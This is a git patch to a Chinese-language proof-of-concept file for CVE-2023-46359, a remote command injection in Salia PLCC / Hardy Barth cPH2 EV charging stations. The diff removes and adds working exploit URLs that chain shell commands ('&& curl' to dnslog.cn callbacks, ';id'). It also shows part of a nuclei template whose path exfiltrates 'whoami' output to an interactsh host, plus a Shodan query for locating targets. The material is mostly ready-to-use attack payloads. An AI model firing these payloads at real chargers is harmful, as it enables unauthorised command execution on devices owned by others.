From 89bee78821d1cf0c244e16d4e60b20ed4e2c1d0f Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Wed, 11 Jun 2025 14:40:02 +0800 Subject: [PATCH] =?UTF-8?q?Update=20Salia=20PLCC=20cPH2=20=E8=BF=9C?= =?UTF-8?q?=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?(CVE-2023-46359).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...C cPH2 远程命令执行漏洞(CVE-2023-46359).md | 37 +------------------ 1 file changed, 2 insertions(+), 35 deletions(-) diff --git a/wpoc/Salia/Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359).md b/wpoc/Salia/Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359).md index fb2816c..a4e2247 100644 --- a/wpoc/Salia/Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359).md +++ b/wpoc/Salia/Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359).md @@ -5,48 +5,15 @@ "Salia PLCC" ``` -![](./assets/20231226203214.png) - ## poc ``` -/connectioncheck.php?ip=127.0.0.1%20&&%20curl%20http://dnslog.cn - -/connectioncheck.php?ip=127.0.0.1%20&&%20${curl%209qa1r0.dnslog.cn} +/nwcheckexec.php?type=ping&dest=8.8.8.8;id ``` -![](./assets/20231226203501.png) - -![](./assets/20231226203521.png) - - -## yaml poc -``` -id: CVE-2023-46359 - -info: - name: cPH2 Charging Station v1.87.0 - OS Command Injection - author: mlec - severity: critical - description: | - An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature. - remediation: Fixed in version 2.0.0 - reference: - - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/ - - https://nvd.nist.gov/vuln/detail/CVE-2023-46359 - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.6 - cve-id: CVE-2023-46359 - metadata: - verified: true - max-request: 1 - shodan-query: html:"Salia PLCC" - tags: cve,cve2023,salia-plcc,cph2,rce - http: - method: GET path: - - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}" + - "{{BaseURL}}/nwcheckexec.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}" matchers-condition: and matchers: